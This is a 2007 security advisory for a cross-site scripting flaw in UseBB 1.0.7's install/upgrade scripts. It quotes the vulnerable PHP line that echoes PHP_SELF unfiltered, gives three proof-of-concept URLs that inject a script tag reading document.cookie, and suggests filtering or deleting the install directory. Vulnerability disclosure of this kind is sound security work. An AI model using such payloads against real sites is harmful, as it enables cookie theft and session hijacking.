Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17567
HistoryJul 22, 2007 - 12:00 a.m.

UseBB 1.0.x Cross Site Scripting (XSS)

2007-07-2200:00:00
vulners.com
103

#############################################################

Script…: UseBB version: 1.0.7

Script Site…: http://www.usebb.net

Vulnerability…: Cross Site Scripting (XSS)

Acces…: Remote

level…: Dangerous

Author…: S4mi

Contact…: s4mi[at]LinuxMail.org

#############################################################

The affected Files :

/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php

vuln Code: line ~ 86

[code]
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden"
name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step
'.$step : 'Continue to step '.$step ) . '" /></p></form>';
[/code]

The variables PHP_SELF is used without filtering

PoC :

http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/&quot;&gt;&lt;ScRiPt&gt;alert&#40;document.cookie&#41;;&lt;/ScRiPt&gt;
http://127.0.0.1/UseBB/install/upgrade-0-3.php/&quot;&gt;&lt;ScRiPt&gt;alert&#40;document.cookie&#41;;&lt;/ScRiPt&gt;
http://127.0.0.1/UseBB/install/upgrade-0-4.php/&quot;&gt;&lt;ScRiPt&gt;alert&#40;document.cookie&#41;;&lt;/ScRiPt&gt;

Solution :

filtre the PHP_SELF
or you know what's the best lool : Delete the Install directory :D

Shoutz :

Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r … & all Others